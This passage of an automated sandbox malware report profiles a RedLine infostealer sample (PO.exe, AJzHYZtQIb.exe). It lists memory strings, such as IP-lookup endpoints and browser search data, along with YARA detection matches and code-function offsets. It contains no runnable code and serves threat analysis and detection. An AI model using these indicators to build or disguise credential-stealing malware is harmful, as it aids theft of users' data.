                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: PO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: PO.exeString found in binary or memory: http://www.aforgenet.com/framework/
                      Source: AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: PO.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017720F0_2_0017720F
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017E3FB0_2_0017E3FB
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017837D0_2_0017837D
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018E4300_2_0018E430
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001925780_2_00192578
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001726060_2_00172606
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001927A70_2_001927A7
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001808700_2_00180870
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001789340_2_00178934
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0019AA500_2_0019AA50
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017FBD30_2_0017FBD3
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00178D890_2_00178D89
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0019EE320_2_0019EE32
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0019AEFE0_2_0019AEFE
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B706707_2_05B70670
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B7D2107_2_05B7D210
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B7E8187_2_05B7E818
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B7E80A7_2_05B7E80A
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E540F7_2_070E540F
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E61BC7_2_070E61BC
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E4FE87_2_070E4FE8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E2C187_2_070E2C18
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E96D07_2_070E96D0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E53877_2_070E5387
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E539C7_2_070E539C
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E4FD87_2_070E4FD8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E9DE07_2_070E9DE0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E9DF07_2_070E9DF0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E2C097_2_070E2C09
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E99AB7_2_070E99AB
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A516287_2_07A51628
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A52E387_2_07A52E38
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A516387_2_07A51638
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A59E607_2_07A59E60
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A50DB87_2_07A50DB8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A50DC87_2_07A50DC8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A502B87_2_07A502B8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A512007_2_07A51200
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A532707_2_07A53270
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A511F07_2_07A511F0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_02FBE7B014_2_02FBE7B0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_02FBDC9014_2_02FBDC90
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697963014_2_06979630
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697446814_2_06974468
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697331114_2_06973311
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697130014_2_06971300
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697DD1814_2_0697DD18
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697DA2414_2_0697DA24
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697D52814_2_0697D528
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_069712FB14_2_069712FB
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_0546004016_2_05460040
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_054609F016_2_054609F0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_05460A0016_2_05460A00
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA827816_2_07AA8278
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA162816_2_07AA1628
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA163816_2_07AA1638
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA2E3816_2_07AA2E38
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA0DB816_2_07AA0DB8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA0DC816_2_07AA0DC8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA02B816_2_07AA02B8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA120016_2_07AA1200
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA327016_2_07AA3270
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA11F016_2_07AA11F0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D42C1816_2_08D42C18
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D44FE816_2_08D44FE8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D4540F16_2_08D4540F
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D42C0916_2_08D42C09
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D49DF016_2_08D49DF0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D49DE016_2_08D49DE0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D44FD816_2_08D44FD8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D4539C16_2_08D4539C
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D4538716_2_08D45387
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D496D016_2_08D496D0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_010DE7B021_2_010DE7B0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_010DDC9021_2_010DDC90
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678963021_2_06789630
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678446821_2_06784468
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678D52821_2_0678D528
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678121021_2_06781210
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678332021_2_06783320
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678DA3021_2_0678DA30
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678C41821_2_0678C418
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: String function: 0018C468 appears 55 times
                      Source: w4XFffGDz1.exe, 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRzhrA.exe8 vs w4XFffGDz1.exe
                      Source: w4XFffGDz1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
